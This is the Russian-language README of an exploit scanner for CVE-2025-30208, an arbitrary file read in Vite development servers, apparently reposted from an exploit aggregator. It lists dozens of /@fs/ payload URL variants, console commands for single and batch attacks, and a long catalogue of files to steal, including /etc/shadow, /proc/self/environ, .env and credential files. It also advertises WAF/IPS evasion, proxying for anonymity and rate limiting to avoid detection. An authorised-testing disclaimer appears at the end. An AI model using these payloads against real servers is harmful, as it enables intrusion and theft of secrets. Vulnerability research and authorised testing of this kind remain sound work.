## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-TH-SECFORGE-CVE-2025-30208
# 🔥 Сканер уязвимости CVE-2025-30208 Vite (произвольное чтение файлов)
    
**Продвинутый сканер уязвимости CVE-2025-30208 с функциями корпоративного уровня**
_Профессиональный инструмент тестирования на проникновение для обнаружения уязвимости произвольного чтения файлов в Vite_
🚀 Быстрый старт • 📋 Возможности • 🔧 Использование • 📊 Примеры • 🛡️ Безопасность
* * *
## 📖 Обзор
Это комплексный сканер уязвимостей, предназначенный для обнаружения и эксплуатации уязвимости **CVE-2025-30208** в серверах разработки Vite. Уязвимость позволяет осуществлять произвольное чтение файлов через конечные точки файловой системы Vite, что потенциально открывает доступ к конфиденциальным файлам конфигурации, исходному коду и системной информации.
### 🎯 Что делает этот инструмент
* **Обнаруживает** уязвимые экземпляры Vite в сетях
* **Безопасно эксплуатирует** уязвимость произвольного чтения файлов
* **Находит** конфиденциальные файлы и данные конфигурации
* **Формирует отчёты** о результатах в нескольких форматах (HTML, JSON, консоль)
* **Управляет** сеансами сканирования и конфигурациями
* **Корректно обрабатывает** ошибки с помощью механизмов автоматических повторных попыток
### 🏗️ Модульная архитектура
Теперь инструмент имеет **модульную архитектуру** для улучшения сопровождаемости и расширяемости:
* **`CVE-2025-30208.py`** — основное приложение сканера
* **`payloads.py`** — продвинутые эксплойт-пейлоады (60+ вариаций)
* **`sensitive_files.py`** — обширная база конфиденциальных файлов (200+ файлов)
* **`html_template.py`** — улучшенный HTML-шаблон отчётов в хакерском стиле
* * *
## 🚀 Быстрый старт
### Предварительные требования
root@kitploit:~
pip3 install -r requirements.txt
### Базовое использование
root@kitploit:~
python3 CVE-2025-30208.py
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
* * *
## 📋 Возможности
### 🔍 Основное обнаружение уязвимостей
* **60+ продвинутых пейлоадов** : комплексные техники эксплуатации для максимального обнаружения
* **Умное обнаружение** : интеллектуальный анализ ответов для исключения ложных срабатываний
* **Проверка в реальном времени** : непрерывная валидация ответов цели
* **Комплексное тестирование** : проверка всех известных уязвимых конечных точек
### 🛡️ Расширенные функции безопасности
* **Поддержка прокси** : настройка HTTP/HTTPS-прокси для анонимности
* **Пользовательские заголовки** : обход WAF/IPS с помощью пользовательских HTTP-заголовков
* **Ограничение скорости** : настраиваемые задержки для избежания обнаружения
* **Управление сеансами** : сохранение и восстановление сеансов сканирования
* **Проверка ввода** : комплексная валидация параметров
### 🔧 Расширенные возможности
* **Пакетное сканирование** : многопоточное сканирование нескольких целей
* **Поиск конфиденциальных файлов** : автоматическое обнаружение 200+ конфиденциальных файлов
* **Проверка связности** : тестирование протоколов TCP/UDP/HTTP/HTTPS
* **Восстановление после ошибок** : автоматические повторные попытки с экспоненциальной задержкой
* **Комплексное журналирование** : подробные журналы с временными метками
### 📊 Отчёты и вывод
* **🎨 Улучшенные HTML-отчёты** : красивые отчёты об уязвимостях в хакерском стиле с анимациями
* **Экспорт в JSON** : структурированные данные для дальнейшего анализа
* **Вывод в консоль** : цветная индикация в реальном времени
* **Журнальные файлы** : подробные аудит-трассы
* **Интерактивный веб-интерфейс** : встроенный веб-сервер для просмотра отчётов
* * *
## 🔧 Руководство по использованию
### 1\. Базовая конфигурация
root@kitploit:~
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd
CVE-2025-30208 > test
### 2\. Тестирование уязвимости
root@kitploit:~
CVE-2025-30208 > run
# Enable verbose mode for detailed output
CVE-2025-30208 > verbose
CVE-2025-30208 > run
### 3\. Пакетное сканирование
root@kitploit:~
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch
192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Press Enter twice to finish]
### 4\. Поиск конфиденциальных файлов
root@kitploit:~
CVE-2025-30208 > scan
### 5\. Расширенная конфигурация
root@kitploit:~
# Configure proxy
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
# Set custom headers
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}
# Configure rate limiting
CVE-2025-30208 > rate
Enter rate limit: 1.0
### 6\. Улучшенные HTML-отчёты
root@kitploit:~
# Generate beautiful HTML report
CVE-2025-30208 > pull
# Start web server to view report
CVE-2025-30208 > web
# Start web server on specific port
CVE-2025-30208 > web 8081
# Stop web server
CVE-2025-30208 > web off
* * *
## 📊 Справочник команд
* * *
## ⚙️ Параметры конфигурации
* * *
## 🎨 Расширенная система пейлоадов
Сканер теперь использует **60+ различных вариаций пейлоадов** , организованных в `payloads.py`:
### Основные пейлоады @fs
root@kitploit:~
/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url
### Расширенные вариации параметров
root@kitploit:~
/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8
### Специфические вариации Vite
root@kitploit:~
/@fs/{file_path}?raw&vite&dev
/@fs/{file_path}?raw&vite&hot
/@fs/{file_path}?raw&vite&hmr
/@fs/{file_path}?raw&development
/@fs/{file_path}?raw&debug
### Вариации модульных систем
root@kitploit:~
/@fs/{file_path}?raw&esm
/@fs/{file_path}?raw&cjs
/@fs/{file_path}?raw&umd
/@fs/{file_path}?raw&js
/@fs/{file_path}?raw&ts
/@fs/{file_path}?raw&json
/@fs/{file_path}?raw&css
/@fs/{file_path}?raw&html
### Альтернативные конечные точки
root@kitploit:~
/app/{file_path}?raw??
/App/{file_path}?raw??
* * *
## 🔍 Расширенный поиск конфиденциальных файлов
Инструмент теперь проверяет **200+ конфиденциальных файлов** , организованных в `sensitive_files.py`:
### 🖥️ Системные файлы (Linux/Unix)
* `/etc/passwd` — информация об учётных записях пользователей
* `/etc/shadow` — зашифрованные данные паролей
* `/etc/services` — сетевые службы
* `/etc/hosts` — сопоставление имён хостов
* `/etc/fstab` — таблица файловых систем
* `/etc/ssh/sshd_config` — конфигурация SSH-сервера
* `/etc/crontab` — системные задачи cron
* `/etc/sudoers` — конфигурация sudo
### 📊 Информация о процессах
* `/proc/version` — версия ядра
* `/proc/cpuinfo` — информация о процессоре
* `/proc/meminfo` — информация о памяти
* `/proc/self/environ` — окружение процесса
* `/proc/self/cmdline` — командная строка процесса
* `/proc/net/tcp` — TCP-соединения
* `/proc/net/udp` — UDP-соединения
### ⚙️ Конфигурация приложений
* `.env` — переменные окружения
* `.env.local` — локальное окружение
* `.env.production` — производственное окружение
* `config.json` — конфигурация приложения
* `settings.json` — настройки приложения
* `application.properties` — конфигурация Spring
* `application.yml` — YAML-конфигурация
* `database.yml` — конфигурация базы данных
* `secrets.json` — управление секретами
### 📦 Файлы Node.js / JavaScript
* `package.json` — зависимости Node.js
* `package-lock.json` — зафиксированные зависимости
* `yarn.lock` — файл блокировки Yarn
* `vite.config.js` — конфигурация Vite
* `vite.config.ts` — TypeScript-конфигурация Vite
* `tsconfig.json` — конфигурация TypeScript
* `webpack.config.js` — конфигурация Webpack
* `next.config.js` — конфигурация Next.js
* `nuxt.config.js` — конфигурация Nuxt.js
* `angular.json` — конфигурация Angular
* `vue.config.js` — конфигурация Vue.js
* `rollup.config.js` — конфигурация Rollup
* `eslint.config.js` — конфигурация ESLint
### 🔧 Файлы Git
* `.git/config` — конфигурация Git
* `.gitignore` — правила игнорирования Git
* `.gitattributes` — атрибуты Git
* `.gitmodules` — подмодули Git
* `.git/HEAD` — текущая ветка
* `.git/logs/HEAD` — журналы Git
* `.git/refs/heads/master` — ветка master
* `.git/refs/heads/main` — ветка main
### 📚 Документационные файлы
* `README.md` — документация проекта
* `CHANGELOG.md` — журнал изменений
* `LICENSE` — информация о лицензии
* `CONTRIBUTING.md` — руководство по участию
* `AUTHORS` — информация об авторах
* `TODO.md` — список задач
* `ROADMAP.md` — дорожная карта разработки
### 🐳 Файлы Docker
* `Dockerfile` — конфигурация Docker
* `docker-compose.yml` — Docker Compose
* `docker-compose.override.yml` — конфигурация переопределения
* `.dockerignore` — правила игнорирования Docker
* `docker-compose.prod.yml` — производственная конфигурация
* `docker-compose.dev.yml` — конфигурация разработки
### 🌐 Конфигурация веб-сервера
* `nginx.conf` — конфигурация Nginx
* `apache2.conf` — конфигурация Apache
* `httpd.conf` — конфигурация HTTP-демона
* `.htaccess` — контроль доступа Apache
* `web.config` — конфигурация IIS
* `robots.txt` — директивы для поисковых систем
* `sitemap.xml` — структура сайта
* `manifest.json` — манифест веб-приложения
* `sw.js` — сервис-воркер
* `firebase.json` — конфигурация Firebase
* `firebase.rules` — правила безопасности Firebase
### 🪟 Файлы Windows
* `boot.ini` — конфигурация загрузки
* `autoexec.bat` — сценарий автозапуска
* `system.ini` — системная конфигурация
* `win.ini` — конфигурация Windows
* `Users` — пользовательские каталоги
* `Windows` — системные файлы
* `Program Files` — каталоги приложений
### 🍎 Файлы macOS
* `System` — системные файлы
* `Library` — файлы библиотек
* `Applications` — файлы приложений
* `private/etc/hosts` — файл hosts
* `private/etc/passwd` — учётные записи пользователей
### 🗄️ Файлы баз данных
* `database.db` — база данных SQLite
* `database.sqlite` — база данных SQLite
* `data.db` — база данных
* `dump.sql` — дамп базы данных
* `schema.sql` — схема базы данных
* `migrations` — миграции базы данных
### 📝 Журнальные файлы
* `logs` — каталог журналов
* `error.log` — журналы ошибок
* `access.log` — журналы доступа
* `app.log` — журналы приложения
* `debug.log` — отладочные журналы
* `combined.log` — объединённые журналы
### 💾 Резервные копии
* `backup` — каталог резервных копий
* `backup.sql` — резервная копия базы данных
* `backup.zip` — сжатая резервная копия
* `dump` — дамп данных
* `export` — экспорт данных
### 🔒 Безопасность и аутентификация
* `auth.json` — конфигурация аутентификации
* `credentials.json` — хранилище учётных данных
* `keys.json` — управление ключами
* `tokens.json` — хранилище токенов
* `jwt.json` — конфигурация JWT
* `oauth.json` — конфигурация OAuth
### 🔌 Файлы API и сервисов
* `api.json` — конфигурация API
* `swagger.json` — документация API
* `openapi.json` — спецификация OpenAPI
* `graphql.json` — конфигурация GraphQL
* `schema.json` — схема API
### ☁️ Облако и развёртывание
* `cloudformation.yml` — AWS CloudFormation
* `serverless.yml` — serverless-конфигурация
* `terraform.tf` — конфигурация Terraform
* `kubernetes.yml` — конфигурация Kubernetes
* `k8s.yml` — конфигурация Kubernetes
### 📊 Мониторинг и аналитика
* `analytics.json` — конфигурация аналитики
* `monitoring.json` — настройка мониторинга
* `metrics.json` — конфигурация метрик
* `telemetry.json` — данные телеметрии
* * *
## 🎨 Улучшенные HTML-отчёты
Инструмент теперь генерирует **красивые HTML-отчёты в хакерском стиле** со следующими возможностями:
### ✨ Визуальные возможности
* **Фон в стиле «Матрицы»** с анимированными падающими символами
* **Градиентные анимации** и светящиеся эффекты
* **Интерактивные элементы** с эффектами наведения
* **Адаптивный дизайн** для всех устройств
* **Тёмная тема** , оптимизированная для специалистов по безопасности
### 📊 Интерактивная статистика
* **Счётчики в реальном времени** для общего числа утечек и объёма раскрытых данных
* **Индикаторы серьёзности** с цветовой кодировкой
* **Функция копирования** для каждой утечки
* **Предпросмотр содержимого** с размером и количеством строк
* **Разворачиваемые разделы** для детального анализа
### 🔧 Технические возможности
* **Интеграция Google Fonts** (JetBrains Mono, Orbitron)
* **CSS-анимации** и переходы
* **Интерактивность на JavaScript** для улучшенного UX
* **Мобильная адаптивность** дизайна
* **Кроссбраузерная совместимость**
### 🌐 Интеграция с веб-сервером
* **Встроенный HTTP-сервер** для просмотра отчётов
* **Автоматическое открытие браузера**
* **Варианты настройки порта**
* **Простые команды запуска/остановки**
* * *
## 🛡️ Обработка ошибок и восстановление
### Механизм автоматических повторных попыток
* **3 попытки повтора** : неудачные запросы автоматически повторяются
* **Экспоненциальная задержка** : увеличивающаяся задержка между повторными попытками
* **Умная классификация ошибок** : различная обработка разных типов ошибок
* **Корректное восстановление** : инструмент продолжает работу после ошибок
### Категории ошибок
* **NetworkError** : проблемы соединения, тайм-аута или прокси
* **ConfigurationError** : недопустимые настройки и параметры
* **ValidationError** : недопустимые входные параметры
* **ScannerError** : общие ошибки сканера
### Функции валидации
* **Проверка ввода в реальном времени** : все параметры проверяются перед использованием
* **Проверка конфигурации** : полная валидация перед сканированием
* **Проверка связности** : тестирование протоколов TCP/UDP/HTTP/HTTPS
* **Проверка прокси** : проверка формата URL прокси
* * *
## 📁 Выходные файлы
* * *
## 📝 Затронутые версии
### 🚨 Уязвимые версии
root@kitploit:~
6.2.0 ≤ Vite ≤ 6.2.2
6.1.0 ≤ Vite ≤ 6.1.1
6.0.0 ≤ Vite ≤ 6.0.11
5.0.0 ≤ Vite ≤ 5.4.14
Vite ≤ 4.5.9
### ✅ Незатронутые версии
root@kitploit:~
Vite ≥ 6.2.3
6.1.2 ≤ Vite < 6.2.0
6.0.12 ≤ Vite < 6.1.0
5.4.15 ≤ Vite < 6.0.0
4.5.10 ≤ Vite < 5.0.0
* * *
## 🛡️ Безопасность и этичное использование
### ⚠️ Важные замечания по безопасности
* **Только авторизованное тестирование** : используйте только на системах, которыми вы владеете или на тестирование которых имеете явное разрешение
* **Ответственное раскрытие** : сообщайте об уязвимостях владельцам систем
* **Ограничение скорости** : используйте подходящие задержки, чтобы не перегружать цели
* **Использование прокси** : рассмотрите возможность использования прокси для анонимности, когда это уместно
* **Соблюдение законодательства** : обеспечьте соответствие местным законам и нормативным требованиям
### 🔒 Лучшие практики
* Всегда получайте письменное разрешение перед тестированием
* Используйте только в контролируемых средах
* Документируйте все действия по тестированию
* Соблюдайте ограничения скорости и системные ресурсы
* Ответственно сообщайте о находках
* * *
## 🚀 Примеры расширенного использования
### Пример 1: Полное сетевое сканирование
root@kitploit:~
CVE-2025-30208 > set THREADS 20
CVE-2025-30208 > set RATE_LIMIT 0.5
CVE-2025-30208 > set TIMEOUT 10
CVE-2025-30208 > verbose
CVE-2025-30208 > batch
### Пример 2: Скрытое сканирование через прокси
root@kitploit:~
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
CVE-2025-30208 > set RATE_LIMIT 2.0
CVE-2025-30208 > run
### Пример 3: Рабочий процесс расширенной отчётности
root@kitploit:~
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > pull
CVE-2025-30208 > web 8080
### Пример 4: Поиск конфиденциальных файлов
root@kitploit:~
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > scan
* * *
## 🏗️ Структура проекта
root@kitploit:~
CVE-2025-30208/
├── CVE-2025-30208.py # Main scanner application
├── payloads.py # Advanced exploitation payloads (60+)
├── sensitive_files.py # Sensitive file database (200+)
├── html_template.py # Enhanced HTML reporting template
├── README.md # This documentation
├── requirements.txt # Python dependencies
├── logs/ # Log files directory
├── data_leak.html # Generated HTML reports
├── data_leak.json # Generated JSON reports
└── session.json # Saved session configurations
* * *
## 🤝 Вклад в проект
Мы приветствуем вклад в улучшение этого инструмента:
1. **Форкните** репозиторий
2. **Создайте** ветку функции
3. **Внесите** свои изменения
4. **Тщательно протестируйте**
5. **Отправьте** pull request
### Направления для вклада
* Новые вариации пейлоадов в `payloads.py`
* Дополнительные шаблоны конфиденциальных файлов в `sensitive_files.py`
* Улучшенные HTML-шаблоны в `html_template.py`
* Улучшенная обработка ошибок
* Оптимизация производительности
* Улучшение документации
* * *
## 📄 Лицензия
Этот проект лицензирован **только для образовательных целей и авторизованного тестирования безопасности**.
**⚠️ Правовое предупреждение** : Этот инструмент предназначен только для авторизованного тестирования безопасности и исследовательских целей. Пользователи несут ответственность за получение надлежащего разрешения перед тестированием любых систем. Авторы не несут ответственности за любое неправомерное использование этого инструмента.
* * *
## 👨💻 Автор
**ThemeHackers**

_Исследователь безопасности и специалист по тестированию на проникновение_
* * *
**⭐ Если этот инструмент вам помог, пожалуйста, поставьте ему звезду! ⭐**
_Создано с ❤️ для сообщества специалистов по безопасности_